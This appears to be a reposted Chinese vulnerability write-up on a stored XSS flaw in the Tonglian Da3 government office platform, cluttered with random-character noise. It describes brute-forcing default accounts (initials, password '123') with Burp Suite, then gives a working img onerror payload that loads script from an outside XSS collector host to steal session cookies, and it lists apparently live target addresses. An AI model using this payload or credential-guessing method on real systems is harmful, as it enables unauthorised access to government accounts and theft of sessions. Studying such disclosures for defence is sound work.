5 t- D6 @2 u4 Q& \4 g# M
1 ^2 {; N. b" [" \' u, p6 ? 同联Da3协同办公平台后台通用储存型xss漏洞2 l- R: k6 f8 T- i2 |2 q1 ]
. q0 H: S" x% [) s" V
& v6 u: b+ p: l$ P6 w3 A 平台简介:5 G7 n9 W+ l% F) k8 ^
6 G* r0 V7 K$ J8 n5 a/ K
+ R) a. E) k9 C, d9 Z8 H! x
% d$ h) j3 `7 y
- q5 T, Z; L4 \
+ @+ N9 K1 E K d2 q' C. n) y 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ ~! D* v) }3 U$ x* h
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ a: f6 A; m, `7 o2 P: y" A同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! i0 P1 R, P/ Y2 Y# C$ s' g
+ a# Q0 L1 n3 k1 s# j' R) w, S
7 `$ m5 V$ p# p! {' w
4 b8 S/ C& }2 @+ z7 @
- z h6 G& }" ~4 c & m& ~( U! G) E5 o5 K
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% G. D1 a9 Y8 a: F
/ Y. F* d0 S5 V6 ~/ F, |1 k
( I3 f& S6 `, r: A+ i) L% c9 e5 [ 5 c. M& x2 i* H1 N4 a
$ E6 u: K% f% u6 z5 X) [! A
. h: K4 T ]3 K
http://1.1.1.1:7197/cap-aco/#(案例2-)+ S9 [4 c2 c/ E! D& x. ]& I
; ?* a9 N; Q. f5 e0 t) `; E1 |
% B6 a9 ^/ m! [6 J" { S
http://www.XXOO.com (案例1-官网网站)9 v$ q3 P G) j* b7 Q; F, f
' B4 g! k. e0 O+ g" e) Z: W: @. A
9 T c, N( }* \' ~! _
漏洞详情:
- Y6 ?( R' t! X' `5 }" `
0 a& O# ~7 ]. _5 ], G + H0 D- |% e' S$ r
案例一、
& H% g9 l6 K. ~
, b$ X" y& b) R6 a0 a Z$ K8 F5 n + U( R' ~8 E# Y" }! x
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试; {0 |$ Z2 I* \& X/ i8 c
# S: V) a. G t 4 _+ I! {; E% A4 O. p
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( F& q$ q6 [6 |$ H" S: ^$ T
& g4 H/ ~4 ~- E4 [4 n8 \
( R! b j0 d- \1 `/ J3 i. `1 l5 R
' E# U. T2 j- D+ y. L5 f' d2 E# N
7 L/ P0 E7 d% j7 v Y
( o* C- n' l Q( E# B3 U+ b# ?
# [9 A7 b0 S' R" O! o4 S, v
& r; Z' ~' D2 [9 j. I4 T) c
3 ?1 s( q2 R5 E/ H* f6 P
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
4 @6 i" n# m: W( @0 ?
8 D4 v0 [& }; x! T ) C1 }5 @3 n# ]. s& u8 o% L
& ~/ e# K; L: d% X
8 U/ z& B7 E: ^4 a) Q
3 Q% N8 ~- z. l. H& ]0 j, H
, l6 l$ `: t% H
8 Z1 j) X7 g, j8 T5 ^' s3 z 3 N% V+ k8 F, o4 U" a+ L( w
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 3 ^5 q, }# e" ~7 F
" c# q3 q9 J( p/ g8 S
4 R- m1 d2 Y+ G1 f0 e( M+ t
$ z4 z* L& k$ |5 B6 X, u5 z
& K+ R- ]- E) m* E
1 `2 t" I- c" ?7 V2 F3 f <img src=x6 l7 c6 i# U* W$ G6 a# y) _
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: * v s! u; A- u" q+ t$ @- v
" y. Q: C! S6 H3 s, D
# Y: X" L; f) l3 _3 _0 Y
# P3 ^1 L" J- D- N: U/ x
5 e7 p3 f1 B8 Z3 g- C2 {9 E
" t$ N, g' Q% G2 t" i$ @5 t0 T" u
然后发送,接收cookie如图: - P; j$ T# L! c
3 X% |7 n# A/ d8 b$ _0 t
5 E: Z% r5 ~6 T8 L s* i. Z
7 c+ t7 a4 D5 Z& Y& p
% b+ X! C" N' S- A, V / e% ^8 t% r3 o# d f* G& {
+ R6 o" F0 F8 u3 m6 l- V, \
9 T& [' N" Y E$ `
( F. L1 L1 g6 u6 X
6 X5 r/ v: G+ P2 w8 H
9 e2 P; v4 U5 x- n/ z9 V
! s$ M8 i* L3 h! | # G, Y, t6 \5 t( }: w
: i9 e- c J0 o- C* G, F7 W
& b3 I3 a; m2 T- H5 ?1 ~
% v4 V6 {! d8 i) {
( z& h+ V+ L. ]1 `9 ^; }
: i' R2 n7 C- d9 q$ A3 O5 {
9 I/ @# z1 r: r2 X1 p+ l
9 b& E- E$ r# X; i% D) Z" p
# y! ?: e: W' i( r& Z4 ? 4 P' g+ m6 o. U' M/ `* S- _2 @
8 J8 w. |; i( x0 j# D
, K- o5 w" p8 R: x3 h4 d2 m
案例2、 ! [4 S, r/ z/ w3 j
9 n) B, u% G X% p+ C3 e% l
. g6 |" d @1 [1 j. k6 L" f# Q 前面步骤都一样,下面看效果图: & I) Q1 ^7 M9 E: Z/ f& W* N
( s2 w( m. {! j9 p! j# q
4 G1 E$ |$ L4 O3 }$ Y6 a. v2 c& G% I: f: {4 B
! k `% v+ q9 t ?& x$ ~
; Y( p! v- m7 P! i
8 H, L. [+ w& g# |$ C
6 P' {$ M2 |8 R+ {( h5 {
0 M- S4 v9 X. M0 L7 ~
; b9 H' A" p( P8 s1 w3 B# G s+ A* p
& x; ^7 A3 q v: m3 l* E
7 T1 L& M$ A) v( M; a; [; o: q
/ O4 A' i0 `- F; L! A4 V& R7 E 2 Q9 E7 n1 K5 C' T
0 d; k/ K8 v0 r0 K; I- e/ G
% `+ J: y& Z. O( ]. Q% a" R! }6 M k( o$ @$ |4 {- ^
; p7 U- K. _0 N4 s. x
8 U( r Q3 z5 z ) U& T: a2 ?. r2 l
2 s+ ^1 k# p; U, P5 m
+ W8 H, x8 ?6 E5 M/ @
- P4 M* Z1 r$ _3 b
1 ?# F1 D, N8 ]! v+ g% g z
5 E4 C9 A8 X! U8 ^8 H7 g
# l% L2 D* ` _3 d# v
3 }# t: n- ?/ K8 N- m# R$ R: j' q 3 z" R; P; J5 L5 S/ y
$ q. V1 i$ I. U: C. O' ^1 E, B( t
( d i/ t4 r2 H5 d% p